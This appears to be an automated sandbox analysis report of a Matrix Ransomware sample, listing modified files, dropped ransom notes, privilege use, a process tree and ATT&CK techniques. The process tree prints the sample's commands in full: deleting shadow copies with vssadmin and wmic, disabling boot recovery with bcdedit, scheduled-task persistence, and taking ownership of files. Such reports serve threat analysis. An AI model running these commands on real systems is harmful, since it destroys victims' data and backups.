e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\j2pkcs11.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\jvm.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\th.pak.DATA e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-ui.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\config.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\fr-CA.pak.DATA e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightRegular.ttf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\sq.pak.DATA e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\sk.pak.DATA e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\plugins\demux\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-nodes_zh_CN.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4340 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5080 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2684 powershell.exe 2684 powershell.exe 636 ETYBXuQh64.exe 636 ETYBXuQh64.exe 636 ETYBXuQh64.exe 636 ETYBXuQh64.exe 636 ETYBXuQh64.exe 636 ETYBXuQh64.exe 636 ETYBXuQh64.exe 636 ETYBXuQh64.exe 636 ETYBXuQh64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 636 ETYBXuQh64.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeDebugPrivilege 2684 powershell.exe Token: SeDebugPrivilege 636 ETYBXuQh64.exe Token: SeLoadDriverPrivilege 636 ETYBXuQh64.exe Token: SeBackupPrivilege 3248 vssvc.exe Token: SeRestorePrivilege 3248 vssvc.exe Token: SeAuditPrivilege 3248 vssvc.exe Token: SeIncreaseQuotaPrivilege 1300 WMIC.exe Token: SeSecurityPrivilege 1300 WMIC.exe Token: SeTakeOwnershipPrivilege 1300 WMIC.exe Token: SeLoadDriverPrivilege 1300 WMIC.exe Token: SeSystemProfilePrivilege 1300 WMIC.exe Token: SeSystemtimePrivilege 1300 WMIC.exe Token: SeProfSingleProcessPrivilege 1300 WMIC.exe Token: SeIncBasePriorityPrivilege 1300 WMIC.exe Token: SeCreatePagefilePrivilege 1300 WMIC.exe Token: SeBackupPrivilege 1300 WMIC.exe Token: SeRestorePrivilege 1300 WMIC.exe Token: SeShutdownPrivilege 1300 WMIC.exe Token: SeDebugPrivilege 1300 WMIC.exe Token: SeSystemEnvironmentPrivilege 1300 WMIC.exe Token: SeRemoteShutdownPrivilege 1300 WMIC.exe Token: SeUndockPrivilege 1300 WMIC.exe Token: SeManageVolumePrivilege 1300 WMIC.exe Token: 33 1300 WMIC.exe Token: 34 1300 WMIC.exe Token: 35 1300 WMIC.exe Token: 36 1300 WMIC.exe Token: SeIncreaseQuotaPrivilege 1300 WMIC.exe Token: SeSecurityPrivilege 1300 WMIC.exe Token: SeTakeOwnershipPrivilege 1300 WMIC.exe Token: SeLoadDriverPrivilege 1300 WMIC.exe Token: SeSystemProfilePrivilege 1300 WMIC.exe Token: SeSystemtimePrivilege 1300 WMIC.exe Token: SeProfSingleProcessPrivilege 1300 WMIC.exe Token: SeIncBasePriorityPrivilege 1300 WMIC.exe Token: SeCreatePagefilePrivilege 1300 WMIC.exe Token: SeBackupPrivilege 1300 WMIC.exe Token: SeRestorePrivilege 1300 WMIC.exe Token: SeShutdownPrivilege 1300 WMIC.exe Token: SeDebugPrivilege 1300 WMIC.exe Token: SeSystemEnvironmentPrivilege 1300 WMIC.exe Token: SeRemoteShutdownPrivilege 1300 WMIC.exe Token: SeUndockPrivilege 1300 WMIC.exe Token: SeManageVolumePrivilege 1300 WMIC.exe Token: 33 1300 WMIC.exe Token: 34 1300 WMIC.exe Token: 35 1300 WMIC.exe Token: 36 1300 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1492 wrote to memory of 2120 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 80 PID 1492 wrote to memory of 2120 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 80 PID 1492 wrote to memory of 2120 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 80 PID 1492 wrote to memory of 2548 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 82 PID 1492 wrote to memory of 2548 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 82 PID 1492 wrote to memory of 2548 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 82 PID 1492 wrote to memory of 2440 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 88 PID 1492 wrote to memory of 2440 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 88 PID 1492 wrote to memory of 2440 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 88 PID 2440 wrote to memory of 2684 2440 cmd.exe 90 PID 2440 wrote to memory of 2684 2440 cmd.exe 90 PID 2440 wrote to memory of 2684 2440 cmd.exe 90 PID 1492 wrote to memory of 4960 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 94 PID 1492 wrote to memory of 4960 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 94 PID 1492 wrote to memory of 4960 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 94 PID 1492 wrote to memory of 1728 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 97 PID 1492 wrote to memory of 1728 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 97 PID 1492 wrote to memory of 1728 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 97 PID 1728 wrote to memory of 4244 1728 cmd.exe 98 PID 1728 wrote to memory of 4244 1728 cmd.exe 98 PID 1728 wrote to memory of 4244 1728 cmd.exe 98 PID 4960 wrote to memory of 3472 4960 cmd.exe 99 PID 4960 wrote to memory of 3472 4960 cmd.exe 99 PID 4960 wrote to memory of 3472 4960 cmd.exe 99 PID 1492 wrote to memory of 1748 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 100 PID 1492 wrote to memory of 1748 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 100 PID 1492 wrote to memory of 1748 1492 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 100 PID 4960 wrote to memory of 404 4960 cmd.exe 102 PID 4960 wrote to memory of 404 4960 cmd.exe 102 PID 4960 wrote to memory of 404 4960 cmd.exe 102 PID 4960 wrote to memory of 1128 4960 cmd.exe 103 PID 4960 wrote to memory of 1128 4960 cmd.exe 103 PID 4960 wrote to memory of 1128 4960 cmd.exe 103 PID 1748 wrote to memory of 1788 1748 cmd.exe 104 PID 1748 wrote to memory of 1788 1748 cmd.exe 104 PID 1748 wrote to memory of 1788 1748 cmd.exe 104 PID 1748 wrote to memory of 3008 1748 cmd.exe 105 PID 1748 wrote to memory of 3008 1748 cmd.exe 105 PID 1748 wrote to memory of 3008 1748 cmd.exe 105 PID 4244 wrote to memory of 2052 4244 wscript.exe 106 PID 4244 wrote to memory of 2052 4244 wscript.exe 106 PID 4244 wrote to memory of 2052 4244 wscript.exe 106 PID 2052 wrote to memory of 4340 2052 cmd.exe 109 PID 2052 wrote to memory of 4340 2052 cmd.exe 109 PID 2052 wrote to memory of 4340 2052 cmd.exe 109 PID 1748 wrote to memory of 808 1748 cmd.exe 110 PID 1748 wrote to memory of 808 1748 cmd.exe 110 PID 1748 wrote to memory of 808 1748 cmd.exe 110 PID 1748 wrote to memory of 960 1748 cmd.exe 111 PID 1748 wrote to memory of 960 1748 cmd.exe 111 PID 1748 wrote to memory of 960 1748 cmd.exe 111 PID 960 wrote to memory of 400 960 cmd.exe 112 PID 960 wrote to memory of 400 960 cmd.exe 112 PID 960 wrote to memory of 400 960 cmd.exe 112 PID 400 wrote to memory of 636 400 ETYBXuQh.exe 113 PID 400 wrote to memory of 636 400 ETYBXuQh.exe 113 PID 4244 wrote to memory of 680 4244 wscript.exe 114 PID 4244 wrote to memory of 680 4244 wscript.exe 114 PID 4244 wrote to memory of 680 4244 wscript.exe 114 PID 680 wrote to memory of 3976 680 cmd.exe 116 PID 680 wrote to memory of 3976 680 cmd.exe 116 PID 680 wrote to memory of 3976 680 cmd.exe 116 PID 4084 wrote to memory of 5080 4084 cmd.exe 119 PID 4084 wrote to memory of 5080 4084 cmd.exe 119 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1788 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe"C:\Users\Admin\AppData\Local\Temp\e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe"1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe" "C:\Users\Admin\AppData\Local\Temp\NWDoIXfb.exe"2⤵PID:2120
-
-
C:\Users\Admin\AppData\Local\Temp\NWDoIXfb.exe"C:\Users\Admin\AppData\Local\Temp\NWDoIXfb.exe" -n2⤵
- Executes dropped EXE
PID:2548
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\sClalzaj.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Syit07VC.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Syit07VC.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:3472
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:404
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:1128
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\WU68f2OM.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\WU68f2OM.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\DvcTOjPS.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\DvcTOjPS.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:4340
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:3976
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c3pj65MW.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""2⤵
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"3⤵
- Views/modifies file attributes
PID:1788
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:3008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ETYBXuQh.exe -accepteula "classes.jsa" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Users\Admin\AppData\Local\Temp\ETYBXuQh.exeETYBXuQh.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Users\Admin\AppData\Local\Temp\ETYBXuQh64.exeETYBXuQh.exe -accepteula "classes.jsa" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:636
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\DvcTOjPS.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:5080
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:2584
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:4344
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:4340
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3248
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Hidden Files and Directories
1Modify Registry
2